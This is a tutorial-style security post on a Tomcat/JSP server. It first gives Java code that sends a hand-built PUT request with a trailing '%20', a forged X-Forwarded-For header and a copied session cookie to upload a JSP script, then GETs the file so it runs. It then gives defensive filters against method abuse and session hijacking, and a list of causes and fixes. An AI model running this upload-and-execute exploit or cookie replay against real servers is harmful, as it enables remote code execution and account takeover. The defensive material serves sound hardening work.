Bypassing server restrictions
By building the request headers ourselves we can get around the server's restrictions: forge a request header and impersonate another identity.
```java
package com.mtlk.test;

import java.io.*;
import java.net.Socket;
import java.util.Scanner;

public class Put {
    public static void main(String[] args) throws IOException {
        StringBuffer body = new StringBuffer("");
        // InputStream ii = new FileInputStream("E:/123.jsp");
        // read the local script file
        InputStream ii = new FileInputStream("E:/qxx.jsp");
        Scanner ss = new Scanner(ii);
        while (ss.hasNextLine()) {
            body.append(ss.nextLine());
        }
        // StringBuilder request = new StringBuilder("PUT /exam/qxx555.jsp%20 HTTP/1.1\r\n");
        // build the request
        StringBuilder request = new StringBuilder("PUT /exam/qxx789.jsp%20 HTTP/1.1\r\n");
        request.append("HOST:10.0.100.10\r\n");
        request.append("X-Forwarded-For:192.168.18.51\r\n");
        request.append("User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 FireFox/78.0\r\n");
        request.append("Cookie:JSESSIONID=02C9D0FBFB03537475774E3C1A935A9C\r\n");
        // request.append("Content-Type:text/html\r\n");
        // request.append("Content-Length:" + body.toString().length() + "\r\n\r\n");
        request.append(body.toString());
        System.out.println(request.toString());

        // send the raw request over a plain socket and echo the response
        Socket s = new Socket("10.0.100.10", 8080);
        PrintWriter pw = new PrintWriter(s.getOutputStream(), true);
        pw.println(request.toString());
        pw.flush();
        InputStream is = s.getInputStream();
        Scanner sc = new Scanner(is);
        System.out.println("-------------------------------");
        while (sc.hasNextLine()) {
            System.out.println(sc.nextLine());
        }
    }
}
```
When building the request, fill in the permitted IP address, the browser information and even the cookie.
Use the PUT vulnerability to upload a file; the script inside the file is then executed.
Then use GET to fetch the file.
```java
package com.mtlk.test;

import java.io.IOException;
import java.io.InputStream;
import java.io.PrintWriter;
import java.net.Socket;
import java.util.Scanner;

public class Get {
    public static void main(String[] args) throws IOException {
        Socket s = new Socket("10.0.100.10", 8080);
        // StringBuilder sb = new StringBuilder("GET /exam/qxx555.jsp HTTP/1.1\r\n");
        // fetch the file from the server
        StringBuilder sb = new StringBuilder("GET /exam/qxx789.jsp HTTP/1.1\r\n");
        // set the matching request headers
        sb.append("HOST:10.0.100.10:8080\r\n");
        sb.append("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 FireFox/78.0\r\n");
        sb.append("Cookie:02C9D0FBFB03537475774E3C1A935A9C\r\n");
        sb.append("X-Forwarded-For:192.168.18.51\r\n");
        PrintWriter pw = new PrintWriter(s.getOutputStream());
        pw.println(sb.toString());
        pw.flush();
        System.out.println(sb.toString());
        System.out.println("---------------------------------------------");

        // print whatever the server returns
        InputStream is = s.getInputStream();
        Scanner ss = new Scanner(is);
        while (ss.hasNextLine()) {
            System.out.println(ss.nextLine());
        }
    }
}
```
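The two requests above only succeed because the server still honours write methods. On Tomcat the first thing to check is the DefaultServlet `readonly` init-param in conf/web.xml: its default is true, and PUT/DELETE are only accepted when someone has set it to false. An application can additionally refuse write methods itself before any path handling runs, which makes the trailing `%20` in the request line irrelevant. The filter below is an added example written for this page, not code from the original post; the package name, the contents of the allowlist and deployment via Servlet 3.x annotation scanning (javax.servlet) are assumptions.

```java
package com.example.defense; // hypothetical package, not from the original post

import java.io.IOException;
import java.util.Set;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.annotation.WebFilter;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/**
 * Rejects every HTTP method the application does not actually use, so a
 * hand-built PUT never reaches the default servlet no matter how the
 * path is encoded: the method is checked before the URI is interpreted.
 */
@WebFilter(urlPatterns = "/*")
public class MethodAllowlistFilter implements Filter {

    // Methods this application needs (assumed set); everything else gets 405.
    private static final Set<String> ALLOWED = Set.of("GET", "POST", "HEAD");

    @Override
    public void init(FilterConfig filterConfig) { }

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) res;
        String method = request.getMethod().toUpperCase();

        if (!ALLOWED.contains(method)) {
            // Log what an investigator needs: the real TCP peer (getRemoteAddr),
            // not X-Forwarded-For, which the client fills in itself, plus the
            // forged value so the two can be compared later.
            request.getServletContext().log(String.format(
                    "blocked method=%s uri=%s peer=%s xff=%s",
                    method, request.getRequestURI(), request.getRemoteAddr(),
                    request.getHeader("X-Forwarded-For")));
            response.setHeader("Allow", String.join(", ", ALLOWED));
            response.sendError(HttpServletResponse.SC_METHOD_NOT_ALLOWED);
            return;
        }
        chain.doFilter(req, res);
    }

    @Override
    public void destroy() { }
}
```

Deploying this class under WEB-INF/classes is enough on a Servlet 3.x container. If the application serves CORS preflights, add OPTIONS to the allowlist; the point is to name the methods that are needed rather than to block the ones that happen to be known dangerous. The log line deliberately records `getRemoteAddr()` next to the X-Forwarded-For value, because the post's request shows exactly why the header alone cannot be trusted.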
Causes and fixes
Identity forgery
Cause
Session based: obtain someone else's cookie and put it into your own request headers.
Fix
Check session expiry; never store key user information in the cookie.
Kick the account's previous session offline; check whether the IP address belongs to the user's usual location.
Authentication failure
Cause
The session is not validated; nothing is stored in the session after login.
Fix
Check that the session is populated after login and that the session is actually validated.
Test by accessing functional pages and submitting requests without being logged in.
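One way to implement the fixes listed above on a Tomcat/JSP application, as an added example that is not code from the original post: a servlet Filter that serves a page only when the session was populated by a real login and still matches the client that logged in, a login helper that starts a fresh session and kicks the account's earlier session offline, and a listener that keeps the bookkeeping from leaking. The package name, the login page path `/login.jsp`, the `/static/` prefix, the 15-minute idle timeout and the use of javax.servlet 3.x annotations are assumptions.

```java
package com.example.defense; // hypothetical package, not from the original post

import java.io.IOException;
import java.util.Map;
import java.util.Objects;
import java.util.concurrent.ConcurrentHashMap;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.annotation.WebFilter;
import javax.servlet.annotation.WebListener;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import javax.servlet.http.HttpSessionEvent;
import javax.servlet.http.HttpSessionListener;

/**
 * Guards every page except the login page and static assets. A request is
 * served only when its session was populated by login() and still matches
 * the client that logged in; a JSESSIONID copied into a hand-built request
 * from another machine fails the binding check and the session is ended.
 */
@WebFilter(urlPatterns = "/*")
public class SessionGuardFilter implements Filter {

    static final String ATTR_USER = "auth.user";       // set only by login()
    static final String ATTR_UA   = "auth.userAgent";  // User-Agent seen at login
    static final String ATTR_ADDR = "auth.remoteAddr"; // TCP peer address at login

    // user -> the one session currently allowed to act for that account
    private static final Map<Object, HttpSession> ACTIVE = new ConcurrentHashMap<>();

    /** Call once credentials are verified: fresh session, client fingerprint
     *  recorded, any earlier session of the same user kicked offline. */
    public static void login(HttpServletRequest request, String user) {
        HttpSession old = request.getSession(false);
        if (old != null) old.invalidate();         // never keep a pre-login session id
        HttpSession session = request.getSession(true);
        session.setMaxInactiveInterval(15 * 60);   // idle expiry in seconds (assumed)
        session.setAttribute(ATTR_USER, user);
        session.setAttribute(ATTR_UA, request.getHeader("User-Agent"));
        session.setAttribute(ATTR_ADDR, request.getRemoteAddr());
        HttpSession previous = ACTIVE.put(user, session);
        if (previous != null) {
            try { previous.invalidate(); } catch (IllegalStateException alreadyGone) { }
        }
    }

    @Override
    public void init(FilterConfig filterConfig) { }

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) res;

        String path = request.getRequestURI().substring(request.getContextPath().length());
        if (path.equals("/login.jsp") || path.startsWith("/static/")) {
            chain.doFilter(req, res);              // public resources (assumed paths)
            return;
        }

        HttpSession session = request.getSession(false);
        Object user = session == null ? null : session.getAttribute(ATTR_USER);
        if (user == null) {
            // No login populated this session: the request is anonymous no matter
            // which Cookie or X-Forwarded-For headers the client chose to send.
            response.sendError(HttpServletResponse.SC_UNAUTHORIZED);
            return;
        }

        boolean sameClient =
                Objects.equals(session.getAttribute(ATTR_UA), request.getHeader("User-Agent"))
             && Objects.equals(session.getAttribute(ATTR_ADDR), request.getRemoteAddr());
        if (!sameClient) {
            // Valid session id presented by a different client: treat as theft.
            request.getServletContext().log("session of user " + user
                    + " replayed from " + request.getRemoteAddr() + "; invalidating");
            ACTIVE.remove(user, session);
            session.invalidate();
            response.sendError(HttpServletResponse.SC_UNAUTHORIZED);
            return;
        }
        chain.doFilter(req, res);
    }

    @Override
    public void destroy() { }

    /** Drops the map entry when the container expires a session, so ACTIVE cannot leak. */
    @WebListener
    public static class Cleanup implements HttpSessionListener {
        @Override
        public void sessionCreated(HttpSessionEvent e) { }

        @Override
        public void sessionDestroyed(HttpSessionEvent e) {
            Object user = e.getSession().getAttribute(ATTR_USER);
            if (user != null) ACTIVE.remove(user, e.getSession());
        }
    }
}
```

Two design points are worth spelling out. The post's own request copies the victim's User-Agent, so the User-Agent comparison alone would not have stopped it; what the attacker cannot forge from their own machine is the TCP peer address that `getRemoteAddr()` returns, which is why the binding uses that and ignores X-Forwarded-For. Behind a reverse proxy `getRemoteAddr()` is the proxy, so configure Tomcat's RemoteIpValve with the trusted proxy addresses before relying on it, and note that the static `ACTIVE` map only works on a single node; a clustered deployment would keep the same user-to-session record in a shared store.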